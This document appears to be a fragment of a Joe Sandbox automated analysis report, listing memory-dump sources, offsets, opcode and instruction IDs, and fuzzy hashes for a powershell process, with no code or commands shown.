                                                                                                          • Instruction ID: aa6320e8d88b39eab1c7d30d97c431ca5c29b41c4a8cf03c9e87c77d8cfbceca
                                                                                                          • Opcode Fuzzy Hash: b2cbf2f829555313f5ca119b79540fa6134ecc6cced28fcbdef589c3c6dadafa
                                                                                                          • Instruction Fuzzy Hash: 1C122930A08A5D4FDB98DF5CC8A5AA977E1FF59310F1502BAD059C72A6CA74FC42CB80
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6737ce72e466b329482116e49b45e4eedd03649d29faa03ff417f3725f7f882f
                                                                                                          • Instruction ID: 612d73f7181e9904af7f09cbdece4186180b4e14057bbc3857c98ac7db205ca7
                                                                                                          • Opcode Fuzzy Hash: 6737ce72e466b329482116e49b45e4eedd03649d29faa03ff417f3725f7f882f
                                                                                                          • Instruction Fuzzy Hash: FD12B330A18A4D8FDF98DF5CC4A5AB977E1FFA8310F15416DE459C72A6CA74E881CB80
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f3f859d9efc7e6be65f88778e47e69194faedfcf3e351b856e9c368114968c0e
                                                                                                          • Instruction ID: ee5c88687af1d1b55875f51291d88ff76c940f5874441402f621a31900266f70
                                                                                                          • Opcode Fuzzy Hash: f3f859d9efc7e6be65f88778e47e69194faedfcf3e351b856e9c368114968c0e
                                                                                                          • Instruction Fuzzy Hash: 2412F531A08A4D8FDB98DF5CC495AA977F1FFA8310F14416EE459C72A6DA74EC42CB80
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1d739eeb36cdd4102f8dada502ab01d3f9ecdf80415509da4e674fe1bb621c8a
                                                                                                          • Instruction ID: e729db0868cc836d07c55142074789fc54440c8f7a297525b60e47675c3b0580
                                                                                                          • Opcode Fuzzy Hash: 1d739eeb36cdd4102f8dada502ab01d3f9ecdf80415509da4e674fe1bb621c8a
                                                                                                          • Instruction Fuzzy Hash: 2EB1C570A0DA4D4FEBA8EF28C8557F93BD1FF55310F14426AE84DC7292CA74A945CB82
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1802258265.00007FFD9BD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bd20000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ef3a952701bf4147ab6a72dd8a45e1770e63bab073297be63f39e36c14944951
                                                                                                          • Instruction ID: d703b0c6ad8b637224302e1a63b96060fbef7a555a7a55eed0810676481cfde3
                                                                                                          • Opcode Fuzzy Hash: ef3a952701bf4147ab6a72dd8a45e1770e63bab073297be63f39e36c14944951
                                                                                                          • Instruction Fuzzy Hash: F8812832A0EECA0FE7A9DB6848659747BE1EF65214B5911FED04DC71E3DE64AC06C340
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e278b5606563dba92a0c12f371774f435749486be41539187a15339232dd8021
                                                                                                          • Instruction ID: f9c09b8b89342b7c26eac0e9fc24f4b8431fef77e2b6236b4ec0fdbb2a25c60a
                                                                                                          • Opcode Fuzzy Hash: e278b5606563dba92a0c12f371774f435749486be41539187a15339232dd8021
                                                                                                          • Instruction Fuzzy Hash: B0115A7590E7C98FD7179B744C290A47FB0AE23200B0A01DBD488CB0F3D9685908C7A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 89dbd73cb12d68b65bcfed516c3e30bb367247e192cf7e8d3bc89b5c71d2e508
                                                                                                          • Instruction ID: 8c873a7ce2ccf2eb8327261b465cd580291c9b331c9724425435674b35164489
                                                                                                          • Opcode Fuzzy Hash: 89dbd73cb12d68b65bcfed516c3e30bb367247e192cf7e8d3bc89b5c71d2e508
                                                                                                          • Instruction Fuzzy Hash: AAF0B47551DA8DCFCB61EF6884245F87FE0EF29300B0501EBE44DC7171DA60A914CB81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797788194.00007FFD9B99D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B99D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b99d000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9591aef017088f6a165ba9dda5957594e6beffcb98751d515038e43fe26947ef
                                                                                                          • Instruction ID: 80e4312a81442fd4ffe04a75500bce26ac870df64f87655966e3c82f77f48ce3
                                                                                                          • Opcode Fuzzy Hash: 9591aef017088f6a165ba9dda5957594e6beffcb98751d515038e43fe26947ef
                                                                                                          • Instruction Fuzzy Hash: 64413B7140EFC45FE7569B39D8559523FF0EF52320B1605DFD088CB1A3D625A84AC792
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 729bb2aaabdc4a475307f03191e752cf9c327bf6a517465ba67880b6e4129057
                                                                                                          • Instruction ID: 1a9cb0b546030f1afdbd175b441b3e154177a926342a2ecbb81d007149c8ff48
                                                                                                          • Opcode Fuzzy Hash: 729bb2aaabdc4a475307f03191e752cf9c327bf6a517465ba67880b6e4129057
                                                                                                          • Instruction Fuzzy Hash: E131C53091CB4C9FDB18DB5C980A6A9BBE0FB99711F00426FE449D3251DB706855CBC2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3d0dea4c244ce05f60b5854d92d4a5318b66eb346c82c7a56b8d9f754c86f2aa
                                                                                                          • Instruction ID: 2f84f7c0e47edb575f2f887f221245b6f09a7abfc9cc02a6ca5f32db01b86320
                                                                                                          • Opcode Fuzzy Hash: 3d0dea4c244ce05f60b5854d92d4a5318b66eb346c82c7a56b8d9f754c86f2aa
                                                                                                          • Instruction Fuzzy Hash: 0B210A3090CB4C4FEB59DF9C984A7E97BE0EB95321F04426FD449C3152D774645ACB92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 14bb9041e0f947f39e18c3aa8acc0a5ef45487655c050c0f91f456dce37760e2
                                                                                                          • Instruction ID: a735a285092e16952cd617c2e188f1c4b02c24ed0d385a182afc95c4dfc0db13
                                                                                                          • Opcode Fuzzy Hash: 14bb9041e0f947f39e18c3aa8acc0a5ef45487655c050c0f91f456dce37760e2
• Instruction Fuzzy Hash: 51312130A1964DCEFBB4AF55CD15BF93291FF41329F414139D44D871A2CAB86A45CB11

Memory Dump Source
• Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 561cdfff6d0ba7e14d648c57dba9d7c719ad949a33057165d4482dc443437060
• Instruction ID: ef4a72a1ef537b7cfa0d0576486500fa1543b639a7da482cd184056b2a0a8c29
• Opcode Fuzzy Hash: 561cdfff6d0ba7e14d648c57dba9d7c719ad949a33057165d4482dc443437060
• Instruction Fuzzy Hash: BA01847021CB0C4FD748EF0CE451AA5B7E0FB85360F10056EE58AC76A1D632E881CB45

Memory Dump Source
• Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6d344f26b5d0f559e8fcf29a4105dc715639ffbb7c04ca811f1b35d776759de0
• Instruction ID: 2516f1320191137b91730f71aa79169aed8a27b622861b4b9d47a901b48d6612
• Opcode Fuzzy Hash: 6d344f26b5d0f559e8fcf29a4105dc715639ffbb7c04ca811f1b35d776759de0
• Instruction Fuzzy Hash: 41F0653170CA0C4BA70CAA1CB8565F973C1DF99361B10417FF40AC7696EC26AC8386C5

Memory Dump Source
• Source File: 00000000.00000002.1802719880.00007FFD9BD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9bd60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ceaefe198905d053fafa484eae18e3cfa7326e91deac6425564a31d235506308
• Instruction ID: 76fa572cbf402e0c627328af416945aba52130e79fe60c230c76dd3ebf92b901
• Opcode Fuzzy Hash: ceaefe198905d053fafa484eae18e3cfa7326e91deac6425564a31d235506308
• Instruction Fuzzy Hash: 6CF0B432B0D5098FD769EB4CE4528AC73E0FF0532071610B6E15DC74B7DA26AC05C740

Memory Dump Source
• Source File: 00000000.00000002.1802719880.00007FFD9BD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9bd60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e83238e4514fd5531b14bea90aaca21b9d3218dc4ce5c0b15f9e8383fe6b0319
• Instruction ID: 3b6e1497e4f317757c8217874c0c09736950f8d0a2743897c3809eaadba27e8d
• Opcode Fuzzy Hash: e83238e4514fd5531b14bea90aaca21b9d3218dc4ce5c0b15f9e8383fe6b0319
• Instruction Fuzzy Hash: 50F05E32B0E5498FDB69EA9CE4528A877E0FF0532071550B6E15EC74A3CB26EC40C750

Strings
Memory Dump Source
• Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
Similarity
• API ID:
• String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^
• API String ID: 0-4011484131
• Opcode ID: 3f8cfca1703d8db53d138871c41e994ee5fe94f173748bac622ac29c9d5700b3
• Instruction ID: 2def0bef0c29edac377d3eb92aaf0642ec1330c95581804ea29bbd0aa1c04cca
• Opcode Fuzzy Hash: 3f8cfca1703d8db53d138871c41e994ee5fe94f173748bac622ac29c9d5700b3
• Instruction Fuzzy Hash: 70517593E0FAEA5BE226477D487A4943F90FF22568B4F13E7C0E84B1A3BD5439464641

Strings
Memory Dump Source
• Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
Similarity
• API ID:
• String ID: M_^$M_^$M_^$M_^$M_^
• API String ID: 0-2396788759
• Opcode ID: 229ae89354eccfed9357d251e78864c1e3dbb38c472d0c566642cceb12367761
• Instruction ID: 405db612b05702757a7cd1e0b42b53707dcfee4853f8b84efbe5cf2233aa799d
• Opcode Fuzzy Hash: 229ae89354eccfed9357d251e78864c1e3dbb38c472d0c566642cceb12367761
• Instruction Fuzzy Hash: D3418492E0F6EA1BF76217BD483A4653B90FF11968F4B12F6C4F44B0A3BD5429864641